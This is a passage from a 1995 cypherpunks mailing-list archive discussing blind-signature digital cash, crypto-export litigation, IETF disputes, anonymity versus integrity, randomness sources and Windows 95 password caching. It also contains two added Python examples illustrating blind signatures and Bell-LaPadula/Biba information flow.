4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

5a) Alice gives the coin to Bob, who deposits it; the bank records the coin
number, and in case of double-spending, the first person to the bank wins.
This is useful for on-line transactions, or off-line where everyone trusts
each other.

OR 5b) Alice gives the coin to Bob using a complicated cut&choose protocol that
doesn't give away her identity if it's only used once, but if she also gives the
same coin to Carol with the same protocol, Bob and Carol can identify Alice
with probability 1 - 1/2**n, for some adequately large n.  This is more work,
but you can use it for off-line transactions where you don't trust Alice
not to double-spend.  The protocol doesn't say what to do to Alice if you
catch her cheating; depending on the environment you can debit her account
or sue her etc.

6) Bob now has a number, signed by the Bank of Foo, which he can either give
to them to deposit or get cash or use for highway toll (if Foo is really the
highway company) or give to somebody else to spend (which is a little messy
in the cut&choose method.)

>Logically, I can see at least four possibilities:
>1) payee data is encoded onto the coin at time of payment, making it 
>impossible for Carol to bank the coin.  I see no evidence of this in the 
>docs at the Digicash site, but I just rechecked quickly and may have 
>missed it.

The basic protocol doesn't say anything about what a valid coin looks like;
you could use the example in Chaum's paper or a long string followed by
a checksum or whatever.  You _could_ put the payee's name account number
in the string as the 64-bit "random" number, or even put both payer and payee.
The bank could insist on that sort of thing if they wanted.
If I remember right, the version in the Digicash trial left you the choice
of filling in a specific payee or using "@" for bearer-payable coins.

>2) No payee data as such is encoded on the coin but it is marked "spent" 
>to prevent multiple uses by payee to the detriment of payor.  

The bank marks the coin spent upon deposit.

>3) the Digicash software only allows you to send a "spent" coin to the 
>bank.  You have to hack the software to send the coin to Carol (do you 
>have to break your own key?).

I don't know if their merchant-client software lets you do this or not,
but it's just a matter of implementation, not protocol.

>4) nothing in the DigiCash software or protocol prevents you from sending 
>a coin to Carol so long as you trust Carol not to get you in trouble by 
>misusing the coin in some way.  That's why Chaum is interested in 
>hardware based agents that would keep you from respending coins you receive.

Your problem isn't trusting Carol not to get you in trouble,
it's trusting Alice not to spend the coin again.
Hardware-based agents are interesting because they make it easier to
enforce double-spending prevention in off-line systems, and to offer
better anonymity because you've got more trust that the person didn't 
double-spend.  Stefan Brands has done a lot of work on this.

In on-line systems you can check whether a coin's been spent already
by depositing it - the problem is that on-line systems aren't
always convenient for many applications (e.g. newspaper machines),
and the costs of communication for an on-line system may be higher
than the cost of a sufficiently smart smart-card.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
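
Steps 1 through 5a of the message above, as an added Python example (not part of the original post and not DigiCash's code): raw RSA blind signing of a coin of the n||n form, followed by on-line deposit where the first depositor wins. The key is a toy built from two Mersenne primes, and every function and class name is an assumption made for this example.

```python
import math
import secrets

# Toy bank key, constructed for this example from two Mersenne primes.
# It is far too structured to be secure; it only keeps the demo offline.
P = 2**89 - 1
Q = 2**107 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # bank's private exponent

MASK64 = 2**64 - 1


def make_coin():
    """Step 1: a nonzero 64-bit number concatenated with itself."""
    half = secrets.randbelow(MASK64) + 1
    return (half << 64) | half


def is_well_formed(coin):
    """The 'recognizable form': both 64-bit halves are equal."""
    return 0 < coin < 2**128 and (coin >> 64) == (coin & MASK64)


def blind(coin):
    """Step 2: multiply by r^E so the bank cannot see the coin."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return (coin * pow(r, E, N)) % N, r


def bank_sign(blinded):
    """Step 3: the bank signs whatever number it is handed."""
    return pow(blinded, D, N)


def unblind(blind_sig, r):
    """Step 4: dividing out r leaves coin^D, a normal signature."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(coin, sig):
    """Anyone with the public key (N, E) can check a coin."""
    return is_well_formed(coin) and pow(sig, E, N) == coin


class Bank:
    """Step 5a: on-line deposit, first depositor of a coin number wins."""

    def __init__(self):
        self.spent = set()
        self.seen_at_withdrawal = []    # everything the bank ever saw signed

    def withdraw(self, blinded):
        self.seen_at_withdrawal.append(blinded)
        return bank_sign(blinded)

    def deposit(self, coin, sig):
        if not verify(coin, sig):
            return "rejected: bad signature or malformed coin"
        if coin in self.spent:
            return "rejected: already spent"
        self.spent.add(coin)
        return "accepted"


def demo():
    bank = Bank()
    coin = make_coin()
    blinded, r = blind(coin)
    sig = unblind(bank.withdraw(blinded), r)
    # A different coin of valid form (low bit of each half flipped),
    # presented with the signature that belongs to the first coin.
    other = coin ^ ((1 << 64) | 1)
    return {
        "bank_saw_coin": coin in bank.seen_at_withdrawal,
        "bob": bank.deposit(coin, sig),
        "carol": bank.deposit(coin, sig),
        "forged": bank.deposit(other, sig),
    }


if __name__ == "__main__":
    for who, outcome in demo().items():
        print(who, "->", outcome)
```

The bank's withdrawal log never contains the coin number it later sees at deposit, which is the untraceability of step 4; the spent set is the only state the on-line variant needs.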





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 3 Nov 1995 17:51:00 +0800
To: cypherpunks@toad.com
Subject: Transcript of Bernstein hearing is now available
Message-ID: <9511020308.AA25206@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We received the transcript of October 20's oral hearing from the court
stenographer.  It's up on the EFF Web site at:

http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

This is from Dan Bernstein's case, which is trying to get the crypto
export laws invalidated as unconstitutional.  This particular hearing
is about the government's motion to throw the case out of court
because the courts don't have jurisdiction to decide the issue.  Some
of it is deep legalese, and some of it is quite readable.

There's still no news from the judge on what her decision is, or when
she will decide.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 2 Nov 1995 12:22:34 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
Message-ID: <199511011817.TAA17785@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
Wed, 01 Nov 11:51 AM

>Why is this being sent to cypherpunks? It's totally 
>irrelevant.


It's related to IBM's work on machine/code interface security, 
encryption and authentication capabilities. Cryptographers may 
want to examine how these work in Microkernal. If IBM will 
allow access to the features.


And it's related to parallel alarms sounded on cypherpunks 
about the impossibility of any durable security which does not 
anticipate ever-changing attacks devised by authors of 
competing products and services.


Finally, not your hat size, to be sure, it's related to the 
vanity of computer security consultants who dismiss unknown 
competition at the peril of their credibility.


"The free market is a terror for tortured souls." Anonymous.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 5 Nov 1995 17:00:10 +0800
To: "baldwin" <baldwin@rsa.com (Robert W. Baldwin)>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815258328@snail.rsa.com>
Message-ID: <9511020101.AA05060@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


On 11/1/95 10:20 AM, perry@piermont.com wrote:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.

This appears to have been a problem from both ends. A number of
people around here only heard about the IPsec work when it had
reached the final call phase.

There also seems to be a move towards looking at the question of
how protocol and cryptography interact as a field in its own right.

I think this highlights one of the problems with the IETF: we need a 
much broader infrastructure for understanding what progress other 
groups have made. The time when we can expect to do everything through 
email alone is past. I wish I could persuade more people in the IETF
that the Web infrastructure could provide a valuable assistance
as a collaboration tool for their needs. Unfortunately the approach seems
to be that because there is a person living at the end of a 2400
baud modem in Vermont who cannot configure his PPP we should all continue
in the stone age. 

We could improve readability of RFCs through using HTML and reduce
the flamage on mailing lists through collaboration tools like the
open meeting. But we don't because it hasn't been done that way in the
past.

I would like to see a collaboration system where I can present an expert
with the context of a proposal very rapidly without expecting them to
read the archives of an entire mailing list.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 08:31:10 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <478k8o$gp@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511010122.CAA29490@utopia.hacktic.nl>,
Anonymous <nobody@REPLAY.COM> wrote:
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Impressive!  I wonder if it works without using algorithms.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 3 Nov 1995 03:41:37 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <199511011915.UAA18695@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom (asgaard@sos.sll.se) wrote:
> Andreas Bogk wrote:
>
> > Please report any leakage of this software immediately to this list.
>
> Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

That's 1.3, not 1.3.1.  What are the changes in the new version?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 10:18:31 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <199511020123.UAA02652@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> This appears to have been a problem from both ends. A number of
> people around here only heard about the IPsec work when it had
> reached the final call phase.

I can't help that. We were very loud about our efforts and I
publicized them wherever I could. I mentioned drafts here on
cypherpunks and elsewhere frequently. We tried to solicit the help of
lots of people in the crypto community. I was begging people for help
with our MD5 and other transforms for months and months. I believe
that lots of people were aware of what was going on and just didn't
take us seriously until the last minute.

> I think this highlights one of the problems with the IETF: we need a 
> much broader infrastructure for understanding what progress other 
> groups have made. The time when we can expect to do everything through 
> email alone is past.

I pretty much know what's going on throughout the IETF, although I
don't know all the petty details. I think that it's a matter of trying
to remain plugged in and following the announcements of drafts.

> I wish I could persuade more people in the IETF that the Web
> infrastructure could provide a valuable assistance as a
> collaboration tool for their needs. Unfortunately the approach seems
> to be that because there is a person living at the end of a 2400
> baud modem in Vermont who cannot configure his PPP we should all
> continue in the stone age.

There are lots of IETF web pages already.

> We could improve readability of RFCs through using HTML

I truly dislike that idea. I hope that this never comes to pass. Text is
just fine. RFCs are perfectly readable right now. The problem is more
getting people to read them than legibility problems. If anything
would be an improvement it would be postscript, and I oppose that even
though it's easy for anyone who wants to to get a postscript interpreter.

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

I would like to see such a thing as well. I would also like to see a
system which permitted perfectly just adjudication of disputes without
need for evidence. Unfortunately, neither is possible.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 10:38:22 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <9511020130.AA17317@all.net>
MIME-Version: 1.0
Content-Type: text


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
	2) A state of being unimpaired; soundness.
	3) The quality or condition of being whole or undivided; soundness
	Also) soundness, completeness,
Alternatively:
	1) Strict personal honesty and independence...
	2) Completeness; unity...
	3) The state of being unimpaired; soundness...''

In this context, I might be misinterpreted as having meant that it is
impossible to have both integrity and anonymity.  That is not what I
meant, although it is probably also true in a very strict sense.

To clarify, I don't think you can assure integrity when you have anonymity.

This follows from my earlier writings (circa 1984-89), which are fairly
extensive, and in which I made the only marginally supported claim that
you can't have (i.e., assure) both integrity and secrecy in a system
with sharing.  This came originally from the result that integrity +
secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
which was extended into a POset which characterizes the extent to which
integrity and secrecy can be maintained based on transitive information
flow.

The less mathematical reasoning is that in order to be able to verify
integrity, you have to be able to examine the information that is
secret, while having secrecy requires that you not be able to have
independent verification.  Thus the two limit each other. 

Anonymity, in this context, can be thought of as secrecy.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
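
An added example, not from the original message or from Cohen's papers, of the claim that Bell-LaPadula combined with Biba leaves no sharing: it enumerates the information flows each rule permits between a few constructed domains. The domain names, the three levels, and the coupling of one label to both secrecy and integrity are assumptions of the example.

```python
from itertools import permutations

RANK = {"low": 0, "mid": 1, "high": 2}


def blp_allows(src, dst):
    """Bell-LaPadula: no read up, no write down, so information moves
    only to equal or higher secrecy."""
    return RANK[src["secrecy"]] <= RANK[dst["secrecy"]]


def biba_allows(src, dst):
    """Biba: no read down, no write up, so information moves only to
    equal or lower integrity."""
    return RANK[src["integrity"]] >= RANK[dst["integrity"]]


def flows(domains, *rules):
    """All ordered pairs (src, dst) that every given rule permits."""
    return {(a, b) for a, b in permutations(domains, 2)
            if all(rule(domains[a], domains[b]) for rule in rules)}


def label(level):
    """One level used for both properties (the coupled case)."""
    return {"secrecy": level, "integrity": level}


# Constructed domains: secrecy and integrity share one label.
COUPLED = {
    "payroll": label("high"),
    "audit": label("high"),
    "staff": label("mid"),
    "web": label("low"),
}

# Constructed domains: the two labels are assigned independently.
INDEPENDENT = {
    "sensor": {"secrecy": "low", "integrity": "high"},
    "archive": {"secrecy": "high", "integrity": "low"},
}


def report(domains):
    """Flows permitted under each rule alone and under both together."""
    return {
        "secrecy only": sorted(flows(domains, blp_allows)),
        "integrity only": sorted(flows(domains, biba_allows)),
        "both": sorted(flows(domains, blp_allows, biba_allows)),
    }


if __name__ == "__main__":
    for name, domains in (("coupled", COUPLED), ("independent", INDEPENDENT)):
        print(name)
        for rule, pairs in report(domains).items():
            print("  %-14s %d flows: %s" % (rule, len(pairs), pairs))
```

With coupled labels only the two same-level domains can exchange anything; with independent labels a one-way flow survives, from the high-integrity, low-secrecy domain to the low-integrity, high-secrecy one.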




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 07:42:17 +0800
To: cypherpunks@toad.com
Subject: Re: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <478lic$vv@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511010235.DAA00908@utopia.hacktic.nl>,
Anonymous <anon-remailer@utopia.hacktic.nl> wrote:
> The difference, of course, is that it's almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

So, what part of your analogy was valid?
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 2 Nov 1995 10:32:40 +0800
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
Message-ID: <m0tAoYD-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Besides non-blocking, it's very useful sometimes to support SIGIO/SIGURG for
as many devices as possible.

I know only too well that Sybase CT_lib uses this for Async mode.
(I just tracked down what appears to be an HPUX process group bug preventing
 the signals from being delivered...)

In any case, using SIGIO is a whole parallel method to using a select loop,
and although it seemed like a hack when I found out they were using it, it
has some elegance since they chain to other possible signal handlers in
case other io descriptors are ready.

> Blocking vs. non-blocking is a standard issue in design of U*X devices.
> Standard solution: make it block by default, and accept an IOCTL to put it in
> non-blocking mode.  There's even a POSIX way to do this:
> 
> 	flags_or_err = fcntl(fd, F_GETFL, 0);
> 	/* check for error: flags_or_err == -1 */
> 	res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
> 	/* check for error: res == -1 */

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@mediacity.com (Norman Hardy)
Date: Thu, 2 Nov 1995 22:14:48 +0800
To: cypherpunks@toad.com
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbe05a801021004ca84@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Stanford University Book Store (on campus) has a bunch at about $49.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 2 Nov 1995 14:30:40 +0800
To: baldwin <baldwin@RSA.COM>
Subject: Re: Rivest on the Design of RC4
In-Reply-To: <9510018152.AA815247765@snail.rsa.com>
Message-ID: <Pine.SUN.3.91.951101214900.28122A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>         Professor Ron Rivest will be presenting a talk titled
> "The Design of RC4" at the RSA Data Security Conference in San Francisco
> (January 17 to 19).  It should be interesting.

What will the legal status of RC4 be after this talk?  Will RSADSI stop 
claiming that RC4 is still protected as a trade secret, or will everyone 
attending the talk be required to sign NDAs?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 2 Nov 1995 15:21:10 +0800
To: cypherpunks@toad.com
Subject: MD5 of CFS131, hacktic
Message-ID: <199511020513.WAA00191@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Andreas Bogk <andreas@artcom.de>
>Please report any leakage of this software immediately to this list.

>From: Mats Bergstrom <asgaard@sos.sll.se>
>Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz


I diffed 1.3 that CFS that I got from att research. The package arrived
to hacktic intact.

I sent PGP-signed MD5 of 1.3.1 to utopia, but got this back:


>From: Oliver Daudey <traveler@utopia.hacktic.nl>
>Subject: Re: CFS 1.3.1
>Date: Mon, 30 Oct 1995 15:51:10 +0100 (MET)
>
>> I have done an md5 on the new cfs. (Everything after the cutmarks)
>> Here it is. Hope you have it soon...
>> 
>> 262b4c6fbec7c729e3e10292f5ea8afb cfs.1.3.1
>> 
>> Don
>
>Sorry, but I need something which is certified with the SSH distribution-
>key (keyID DCB9AE01).



Hmmmm ok. Well, I'll sign it again, for you Cpunks. If you get a different
MD5 (this is everything AFTER the cutmarks) we can diff it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMJhTJcLa+QKZS485AQHsIwL/fkh8d39uW8M7Fo/slO6Rbb42j7tneqz2
wcePuYqyjGFN93IfjPI0ew1jjNqnzI+je6C0dBhk4eTjN7xAFczTqe1U6+yAKZX5
DnX2waPV/i8Pva0NB0t5lzRfCaB1OM/r
=8IC6
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 2 Nov 1995 12:28:45 +0800
To: hallam@w3.org
Subject: IETF on the web.
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <Pine.3.89.9511012227.A48583-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Nov 1995 hallam@w3.org wrote:

> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance

Have you tried <www.ietf.org> ? Seems to have all the relevant links,
Perry's stuff included.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves)
Date: Thu, 2 Nov 1995 14:55:54 +0800
To: unicorn@holly.ACNS.ColoState.EDU (Scott McCormack)
Subject: Re: Win95 password caching
In-Reply-To: <478rbq$o31@yuma.ACNS.ColoState.EDU>
Message-ID: <199511020642.WAA17156@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
csu.windows95,
comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.security.misc,alt.security,comp.os.ms-windows.networking.misc,comp.os.ms-windows.networking.windows,comp.os.ms-windows.nt.admin.networking)

[A little more context and Message-ID added from the original post;
cross-posted to nt.admin because it will affect some of you, followups
out]

In article <4791l0$4n14@holly.ACNS.ColoState.EDU>,
unicorn@holly.ACNS.ColoState.EDU (Scott McCormack) wrote:

> In article <478rbq$o31@yuma.ACNS.ColoState.EDU>,
> Jim Carlson (jimc@cnr.colostate.edu) wrote:
> : Does anyone know how to stop Win95 from caching the windows password?
> : We are thinking of using Win95 as the client for a student lab and 
> : need to find a way to stop it from caching passwords.  As it is, when
> : you log into a machine for the first time it creates a .pwl file in 
> : your windows directory for each person who logs into windows.  This 
> : is not acceptable for a lab situation.
> :
> : I can turn this off in WfWG by placing the line "passwordcachine=no" 
> : in the system.ini under [NETWORK], but this does not work in Win95.
> :
> : I am running MS networking in Win95, so when you first log into 
> : windows, it asks you to log into the MS Network.  It then comes up with 
> : a second box asking you to enter your Win95 password.  You can enter 
> : a blank password (""), but it still creates a .pwl file and places a
> : line in win.ini.
> 
> Change the password for the login (or when you first login) to a blank 
> line (ie don't enter a password) and you'll never see that login prompt 
> again. :)

This was not the question. He wants to prevent local Windows passwords
from being created for network-only users. This is a serious security
issue, because if a user enters her real network password for the Windows
password, and someone else later picks up the .PWL files, which are not
encrypted in a particularly secure way, then someone can get unauthorized
access to the network as the previous user(s).

We believe we have found answers in the Registry and in POLEDIT. We've
also turned up another related security bug. When it's confirmed, we'll
post. In the meantime, you can read the last couple messages archived at
gopher://quixote.stanford.edu/1m/win95netbugs.

-rich
 llurch@networking.stanford.edu
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 22:15:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511020130.AA17317@all.net>
Message-ID: <199511020504.AAA19291@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> I have been convinced for some time that you can't have both integrity and
> anonymity.  
[and in a followup]
> I might be misinterpreted as having meant that it is impossible to have
> both integrity and anonymity. That is not what I meant, [...]

Er, thanks for the clarification....

> Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> 	2) A state of being unimpaired; soundness.
> 	3) The quality or condition of being whole or undivided; soundness
> 	Also) soundness, completeness,
> Alternatively:
> 	1) Strict personal honesty and independence...
> 	2) Completeness; unity...
> 	3) The state of being unimpaired; soundness...''
> 
> In this context, I might be misinterpreted as having meant that it is
> impossible to have both integrity and anonymity.  That is not what I
> meant, although it is probably also true in a very strict sense.

All right, what makes you think that ?  Lest we wave our hands too much and
totally misunderstand each other, let me lay down a more concrete scenario.
If you have a substantially different scenario in mind, let me know.

Suppose that I send an anonymous message to a public forum such as this. I
and the message seem to "have anonymity" by any standard I can presently
imagine. Now, in what ways might I or the message lack integrity in this
situation ?  

I haven't broken my personal ethical codes, although perhaps
I've violated someone else's. I have been honest, at least as much as I am
generally honest in anything I write. I am not lying by donning the cloak of
anonymity; I have not misrepresented my identity, merely refused to reveal
it. The content of the message can be considered sound as much as anything
else can. The message is incomplete in the sense that it does not include
the true identity of the author -- is this what you would claim as a
failure of integrity ?  All messages are incomplete in the sense that
various important facts are absent from them.

> To clarify, I don't think you can assure integrity when you have anonymity.
> 
> This follows from my earlier writings (circa 1984-89), which are fairly
> extensive, and in which I made the only marginally supported claim that
> you can't have (i.e., assure) both integrity and secrecy in a system
> with sharing.  This came originally from the result that integrity +
> secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> which was extended into a POset which characterizes the extent to which
> integrity and secrecy can be maintained based on transitive information
> flow.
> 
> The less mathematical reasoning is that in order to be able to verify
> integrity, you have to be able to examine the information that is
> secret, while having secrecy requires that you not be able to have
> independent verification.  Thus the two limit each other. 
> 
> Anonymity, in this context, can be thought of as secrecy.

I understand the nature of the information flow argument, but I don't see
that it's applicable. You appear to contend that the assurance of the
integrity of an anonymous message depends upon the examination of
information that is "secret", that is, _not part of the message_. But no
message is complete -- all messages have many such associated "secrets" not
available as part of the messages. So the claim seems to be vacuous: we
can assure the integrity of neither anonymous nor verinymous messages.

Perhaps the rejoinder will be that anonymous messages have a 
_characteristic_ piece of missing "secret" information, namely the senders'
True Names. But you have yet to offer any argument that only certain special
"secrets" must be examined in order to verify integrity.

-Futplex <futplex@pseudonym.com>
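
[Added example, not part of the original thread or of either correspondent's writings: the quoted claim that integrity + secrecy = no sharing when Biba and Bell-LaPadula are combined, worked through in code. The domain names, level numbers and the "exposure" helper are constructed for illustration; the second half generalizes to arbitrary sharing by taking the transitive closure of direct flows.]

```python
# Added illustration: information flow permitted when Bell-LaPadula (secrecy)
# and Biba (integrity) are both enforced, plus exposure under transitive flow.

def blp_permits(src, dst):
    """BLP: no read up, no write down, so data flows only to equal or higher secrecy."""
    return src["secrecy"] <= dst["secrecy"]

def biba_permits(src, dst):
    """Biba: no read down, no write up, so data flows only to equal or lower integrity."""
    return src["integrity"] >= dst["integrity"]

def permitted_flows(domains):
    """Return every (src, dst) pair of distinct domains that BOTH models allow."""
    return {
        (a, b)
        for a in domains for b in domains
        if a != b
        and blp_permits(domains[a], domains[b])
        and biba_permits(domains[a], domains[b])
    }

def transitive_closure(names, flows):
    """Warshall's algorithm over a set of edges: who eventually reaches whom."""
    reach = set(flows)
    for k in names:
        for i in names:
            for j in names:
                if (i, k) in reach and (k, j) in reach:
                    reach.add((i, j))
    return reach

def exposure(names, flows):
    """Per domain: who can corrupt it (integrity) and who it can leak to (secrecy)."""
    reach = transitive_closure(names, flows)
    return {
        n: {
            "can_be_corrupted_by": sorted(s for (s, d) in reach if d == n and s != n),
            "can_leak_to": sorted(d for (s, d) in reach if s == n and d != n),
        }
        for n in names
    }

# Constructed case 1: one ordering of levels serves as both the secrecy and
# the integrity label. BLP wants flow upward, Biba wants it downward.
SAME_LABEL = {
    "public":   {"secrecy": 0, "integrity": 0},
    "internal": {"secrecy": 1, "integrity": 1},
    "secret":   {"secrecy": 2, "integrity": 2},
}

# Constructed case 2: independent labels. Some one-way sharing survives.
INDEPENDENT = {
    "vendor_code": {"secrecy": 0, "integrity": 2},  # public but trusted
    "payroll":     {"secrecy": 2, "integrity": 1},  # secret, moderately trusted
    "guest_notes": {"secrecy": 0, "integrity": 0},  # public, untrusted
}

if __name__ == "__main__":
    print("same label  :", sorted(permitted_flows(SAME_LABEL)))
    print("independent :", sorted(permitted_flows(INDEPENDENT)))
    # Constructed direct-sharing graph with no policy at all: alice shares
    # with bob, bob shares with carol, dave shares with nobody.
    people = ["alice", "bob", "carol", "dave"]
    for name, exp in exposure(people, {("alice", "bob"), ("bob", "carol")}).items():
        print(name, exp)
```

With a single label ordering no flow between different levels survives both rules; with sharing allowed, each domain's integrity rests on everything upstream of it and its secrecy on everything downstream.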




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 15:46:04 +0800
To: cypherpunks@toad.com
Subject: Re: Video as a source of randomness
Message-ID: <acbdb0df0002100432a7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:02 AM 11/2/95, Andrew D. Isaacson wrote:
>A thought just occurred to me...
>
>How useful would it be to use a video stream as a source of random input
>to something like /dev/random?  I'm thinking along the lines of a
>Connectix QuickCam (sp?) or the cool videocam that comes with the Indy.
>It seems to me that the picture received by a camera sitting atop a
>monitor would be quite unpredictable. (relatively) High bandwidth, too.
>Even if the entropy in a video signal is low, the high bandwidth would
>seem to make up for it.
>
>Struggling to keep my head above the crypto tide,

Digitized video input, especially from something like a noisy channel (t.v.
channel, for example), is quite likely to produce a lot more entropy bits
per second than nearly any of us ever need. (One's PGP key could be seeded
in a fraction of a millisecond, for example.)

The issue is that most people don't need this number of entropy bits per
second, and that most people don't have video inputs. (And those that do
may not have them hooked up and ready to go.) One of the basic ideas we
have had, as Cypherpunks, is to encourage widespread methods. Any methods
that need special hardware tend to not get widely used.

Audio, video, disk timing, and all sorts of other sources of physical
randomness are useful to have, but most people either won't have the right
configuration or won't configure their systems so as to use their
configuration.

--Tim May, who has both audio and video digitizers built into his Power
Macintosh 7100av, but notes that none of the crypto programs he uses has
any provision for using them, and so he doesn't use them for crypto
purposes.
